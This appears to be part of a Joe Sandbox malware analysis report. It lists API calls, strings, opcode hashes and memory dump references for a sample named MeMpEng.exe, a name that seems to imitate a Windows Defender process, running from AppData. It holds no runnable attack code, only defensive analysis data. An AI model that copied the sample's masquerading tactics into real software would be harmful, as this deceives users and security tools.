                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\AppData\Roaming\MeMpEng.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-2772899653
                                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction ID: 8a5b279eb1c6e0cea376d4f623a12da6f674b8daf8575b9a92ef11e753d0d18b
                                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction Fuzzy Hash: D111B66780121299DB303B158C44AB766E8EF54794F52C03FED8A732C0E77C4C9286AD
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction ID: 9e725ab64d6b149d2d2f876944178e70108deb967c5ff43b0f72f150d1bef9aa
                                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction Fuzzy Hash: DA2177B1500704AFCB309F78DD18B5BBBF4BF41710B04892EEA96A22E0D739E944CB54
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EA9
                                                          • GetMessagePos.USER32 ref: 00404EB1
                                                          • ScreenToClient.USER32(?,?), ref: 00404ECB
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EDD
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F03
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction ID: 20ba1dd8c6eb147b8de8e184d932bb38cbf2a2b27d4ef3642ae6e6b093867634
                                                          • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction Fuzzy Hash: D6015E72900219BADB00DB95DD85FFEBBBCAF95711F10412BBB51B61D0C7B49A018BA4
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E76
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                          • MulDiv.KERNEL32 ref: 00401E98
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                          • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Times New Roman
                                                          • API String ID: 3808545654-927190056
                                                          • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                          • Instruction ID: 03fa82d4c3f414405e360d431a269216209ac9bc2718b2d324fdabe448a9bb24
                                                          • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                          • Instruction Fuzzy Hash: 28018471954250EFEB015BB4AE89BDD3FB4AF59301F10497AF142BA1E2CAB90444DB3D
                                                          APIs
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 0040300B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                                          • Instruction ID: 52c7d57b2d50c4e26d0c42f1be749ca1a93388b8845742b28701603c77c86054
                                                          • Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                                          • Instruction Fuzzy Hash: 89016270640209BBEF209F60DD4AFEE3B79EB04344F10803AFA02B51D0DBB99A559F58
                                                          APIs
                                                            • Part of subcall function 729F12BB: GlobalAlloc.KERNEL32(00000040,?,729F12DB,?,729F137F,00000019,729F11CA,-000000A0), ref: 729F12C5
                                                          • GlobalFree.KERNEL32(?), ref: 729F2743
                                                          • GlobalFree.KERNEL32(00000000), ref: 729F2778
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.837153397.00000000729F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 729F0000, based on PE: true
                                                          • Associated: 0000000B.00000002.837149162.00000000729F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837157292.00000000729F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837161148.00000000729F6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_729f0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: f5ec02f31b3b96b60e1c2491261786ae94144c17b308a88845716a3810f4c4dc
                                                          • Instruction ID: 118a9c60c3fe1ca214fd384662a528aa7ad6678f72b7e15a78cf365dc45f1f2b
                                                          • Opcode Fuzzy Hash: f5ec02f31b3b96b60e1c2491261786ae94144c17b308a88845716a3810f4c4dc
                                                          • Instruction Fuzzy Hash: 6B31A172908101EFC7968F59C984FBA7BBAFB8534832C593DF20197560C7316855CBA3
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                          • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                          • CloseHandle.KERNEL32(?), ref: 00402A5A
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
                                                          • Instruction ID: 5c013e3641f51b8511de27967d5ac64a9b846b719b0e1cdf51d049a21d65d460
                                                          • Opcode Fuzzy Hash: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
                                                          • Instruction Fuzzy Hash: 3D31B171D00128BBCF21AFA5CE4999E7E79AF45324F10423AF511762E1CB794D419F98
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.837153397.00000000729F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 729F0000, based on PE: true
                                                          • Associated: 0000000B.00000002.837149162.00000000729F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837157292.00000000729F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837161148.00000000729F6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_729f0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 7b016cadad845847f2b372f01f430967e5cafb995db217313b35bd5599b22442
                                                          • Instruction ID: e6a8d603250d44086a2d7ddfc05f6bf9941f80f709f78742726ad7c0f4cd509d
                                                          • Opcode Fuzzy Hash: 7b016cadad845847f2b372f01f430967e5cafb995db217313b35bd5599b22442
                                                          • Instruction Fuzzy Hash: 5251B432D00119EACBC69FACC4406AD7ABEEB4431AF1D615ED406B321CE771A995C7E3
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 729F25C2
                                                            • Part of subcall function 729F12CC: lstrcpynW.KERNEL32(00000000,?,729F137F,00000019,729F11CA,-000000A0), ref: 729F12DC
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 729F2548
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 729F2563
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.837153397.00000000729F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 729F0000, based on PE: true
                                                          • Associated: 0000000B.00000002.837149162.00000000729F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837157292.00000000729F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837161148.00000000729F6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_729f0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 4216380887-0
                                                          • Opcode ID: da43a61d1ff91ccf8dbb2a67a5429c05b827395eea99d15c7325aa992d26ea7c
                                                          • Instruction ID: 296a1065462144ae78526bca625c6fde7bedcbe90aea480c1f9eb4d31d5b6834
                                                          • Opcode Fuzzy Hash: da43a61d1ff91ccf8dbb2a67a5429c05b827395eea99d15c7325aa992d26ea7c
                                                          • Instruction Fuzzy Hash: 2341E0B1848305EFD794DF2DD850BA67BB8FB44314F1C492DE64A87580E770A544CBA3
                                                          APIs
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402F22
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402F77
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402F99
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                          • Instruction ID: 9b286c5d8e76f57eb0c9cc6cf8757f48d710680964e76fdf16ae971aa0981de0
                                                          • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                          • Instruction Fuzzy Hash: 64215A7150010ABFDF129F90CE89EEF7A7DEB14398F110076B909B21A0D7B48E54AA64
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                          • GetClientRect.USER32 ref: 00401E0A
                                                          • LoadImageW.USER32 ref: 00401E3A
                                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                          • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
                                                          • Instruction ID: bf706e621430f2b8e1e8296bf8ea73d697ba0e02d4cfc8f60e3200fcd9798b2c
                                                          • Opcode Fuzzy Hash: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
                                                          • Instruction Fuzzy Hash: 57212A72904119AFCB05DF94DE45AEEBBB5EB08300F14403AF945F62A0DB389D81DB98
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,729F22D8,?,00000808), ref: 729F16D5
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,729F22D8,?,00000808), ref: 729F16DC
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,729F22D8,?,00000808), ref: 729F16F0
                                                          • GetProcAddress.KERNEL32(729F22D8,00000000,?,00000000,729F22D8,?,00000808), ref: 729F16F7
                                                          • GlobalFree.KERNEL32(00000000), ref: 729F1700
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.837153397.00000000729F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 729F0000, based on PE: true
                                                          • Associated: 0000000B.00000002.837149162.00000000729F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837157292.00000000729F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837161148.00000000729F6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_729f0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 6073f972c0b77d8c759f2b2db3821b523f3fee3dce1c2ec81c2f96e76022dd3b
                                                          • Instruction ID: 5475a14f66ba1bddf7384e10c05482103b2a7c5d91565b2ae7689af4e218bb21
                                                          • Opcode Fuzzy Hash: 6073f972c0b77d8c759f2b2db3821b523f3fee3dce1c2ec81c2f96e76022dd3b
                                                          • Instruction Fuzzy Hash: 70F0127314A1387BD72016AB9C4CDAB7E9CDF8B2F5B190625F7189119085614C01D7F1
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
                                                          • Instruction ID: 31ba3c168d84f0c85bcad1357d39928db2ba622a9cc012c1a012c7db44d830b4
                                                          • Opcode Fuzzy Hash: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
                                                          • Instruction Fuzzy Hash: 66218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                          APIs
                                                          • lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E21
                                                          • wsprintfW.USER32 ref: 00404E2A
                                                          • SetDlgItemTextW.USER32 ref: 00404E3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
                                                          • Instruction ID: afd2be291b2a15d2af8ae11ee91158e81c8ac3063311500d61ab43a3e8b0c9b4
                                                          • Opcode Fuzzy Hash: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
